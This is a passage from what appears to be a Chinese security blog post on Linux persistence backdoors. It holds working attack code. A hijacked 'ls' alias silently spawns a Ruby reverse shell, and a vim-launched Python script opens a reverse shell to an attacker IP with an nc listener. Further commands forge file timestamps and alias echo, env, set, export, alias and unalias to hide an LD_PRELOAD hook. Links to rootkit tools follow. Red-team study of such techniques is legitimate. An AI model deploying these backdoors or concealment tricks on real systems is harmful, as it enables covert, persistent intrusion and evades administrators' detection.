alias ls&#x3D;&quot;alerts()&#123; ls $* --color&#x3D;auto;ruby -rsocket -e &#39;exit if fork;c&#x3D;TCPSocket.new(&quot;&#39;&quot;&#39;&quot;192.168.1.1&quot;&#39;&quot;&#39;&quot;,&quot;&#39;&quot;&#39;&quot;6666&quot;&#39;&quot;&#39;&quot;);while(cmd&#x3D;c.gets);IO.popen(cmd,&quot;&#39;&quot;&#39;&quot;r&quot;&#39;&quot;&#39;&quot;)&#123;|io|c.print io.read&#125;end&#39;;&#125;;alerts&quot;

alias unalias&#x3D;&#39;alerts()&#123; if [ $# !&#x3D; 0 ]; then if [ $* !&#x3D; &quot;ls&quot; ]&amp;&amp;[ $* !&#x3D; &quot;alias&quot; ]&amp;&amp;[ $* !&#x3D; &quot;unalias&quot; ]; then unalias $*;else echo &quot;-bash: unalias: $&#123;*&#125;: not found&quot;;fi;else echo &quot;unalias: usage: unalias [-a] name [name ...]&quot;;fi;&#125;;alerts&#39;

alias alias&#x3D;&quot;cat &#x2F;etc&#x2F;gnupg&#x2F;.gnupg&quot;

2) 将正常文件的时间复制给包含alias的文件

touch -acmr version-groups.conf yum-update.rc<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h2 id="0x05-vim后门"><a href="#0x05-vim后门" class="headerlink" title="0x05 vim后门"></a>0x05 vim后门</h2><pre class="line-numbers language-none"><code class="language-none">&#x2F;&#x2F; 适用于安装了vim且安装了python扩展(绝大版本默认安装)的linux系统,恶意脚本.py的内容可以是任何功能的后门

cd &#x2F;usr&#x2F;lib&#x2F;python2.7&#x2F;site-packages &amp;&amp; $(nohup vim -E -c &quot;pyfile json.py&quot;&gt; &#x2F;dev&#x2F;null 2&gt;&amp;1 &amp;) &amp;&amp; sleep 2 &amp;&amp; rm -f json.py

&#x2F;&#x2F; 脚本代码

import socket, subprocess, os;
s &#x3D; socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s.connect((&quot;192.168.121.1&quot;, 6666));
os.dup2(s.fileno(), 0);
os.dup2(s.fileno(), 1);
os.dup2(s.fileno(), 2);
p &#x3D; subprocess.call([&quot;&#x2F;bin&#x2F;sh&quot;, &quot;-i&quot;]);

&#x2F;&#x2F;  攻击机监听6666端口并获取反弹的shell

nc -lvnp 6666<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h2 id="0x06-LD-PRELOAD-后门"><a href="#0x06-LD-PRELOAD-后门" class="headerlink" title="0x06 LD_PRELOAD 后门"></a>0x06 LD_PRELOAD 后门</h2><h3 id="环境变量隐藏"><a href="#环境变量隐藏" class="headerlink" title="环境变量隐藏"></a>环境变量隐藏</h3><pre class="line-numbers language-none"><code class="language-none">1) echo $LD_PRELOAD 

alias echo&#x3D;&#39;func()&#123; echo $* | sed &quot;s!&#x2F;home&#x2F;hook.so! !g&quot;;&#125;;func&#39;

2) env

alias env&#x3D;&#39;func()&#123; env $* | grep -v &quot;&#x2F;home&#x2F;hook.so&quot;;&#125;;func&#39;

3) set 

alias set&#x3D;&#39;func()&#123; set $* | grep -v &quot;&#x2F;home&#x2F;hook.so&quot;;&#125;;func&#39;

4) export 

alias export&#x3D;&#39;func()&#123; export $* | grep -v &quot;&#x2F;home&#x2F;hook.so&quot;;&#125;;func&#39;

5) unalias劫持

alias unalias&#x3D;&#39;func()&#123; if [ $# !&#x3D; 0 ]; then if [ $* !&#x3D; &quot;echo&quot; ]&amp;&amp;[ $* !&#x3D; &quot;env&quot; ]&amp;&amp;[ $* !&#x3D; &quot;set&quot; ]&amp;&amp;[ $* !&#x3D; &quot;export&quot; ]&amp;&amp;[ $* !&#x3D; &quot;alias&quot; ]&amp;&amp;[ $* !&#x3D; &quot;unalias&quot; ]; then unalias $*;else echo &quot;-bash: unalias: $&#123;*&#125;: not found&quot;;fi;else echo &quot;unalias: usage: unalias [-a] name [name ...]&quot;;fi;&#125;;func&#39;

6) alias劫持

alias alias&#x3D;&#39;func()&#123; alias &quot;$@&quot; | grep -v unalias | grep -v hook.so;&#125;;func&#39;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="利用工具"><a href="#利用工具" class="headerlink" title="利用工具"></a>利用工具</h3><ul>
<li><a target="_blank" rel="noopener" href="https://github.com/mempodippy/cub3">https://github.com/mempodippy/cub3</a> </li>
<li><a target="_blank" rel="noopener" href="https://github.com/mempodippy/vlany">https://github.com/mempodippy/vlany</a></li>
</ul>
<h2 id="0xFF-Reference"><a href="#0xFF-Reference" class="headerlink" title="0xFF Reference"></a>0xFF Reference</h2><ul>
<li><a target="_blank" rel="noopener" href="https://www.slideshare.net/ulissescastro/50-ton-of-backdoors">https://www.slideshare.net/ulissescastro/50-ton-of-backdoors</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Persistence.md">https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Persistence.md</a></li>
<li><a target="_blank" rel="noopener" href="http://www.91ri.org/9026.html">http://www.91ri.org/9026.html</a></li>
<li><a target="_blank" rel="noopener" href="https://www.cnblogs.com/LittleHann/p/4596223.html">https://www.cnblogs.com/LittleHann/p/4596223.html</a></li>
<li><a target="_blank" rel="noopener" href="https://hackmag.com/security/persistence-cheatsheet/">https://hackmag.com/security/persistence-cheatsheet/</a></li>
</ul>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Linux/" rel="tag" <i class="fa fa-tag"></i> Linux</a>
              <a href="/tags/Persistence/" rel="tag" <i class="fa fa-tag"></i> Persistence</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/posts/50666/" rel="prev" title="Linux入侵痕迹清除姿势">
                  <i class="fa fa-chevron-left"></i> Linux入侵痕迹清除姿势
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/posts/29809/" rel="next" title="Linux提权姿势总结">
                  Linux提权姿势总结 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">L0n9w4y</span>
</div>

    </div>
  </footer>

  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  




  <script src="/js/third-party/pace.js"></script>

  





</body>
</html>
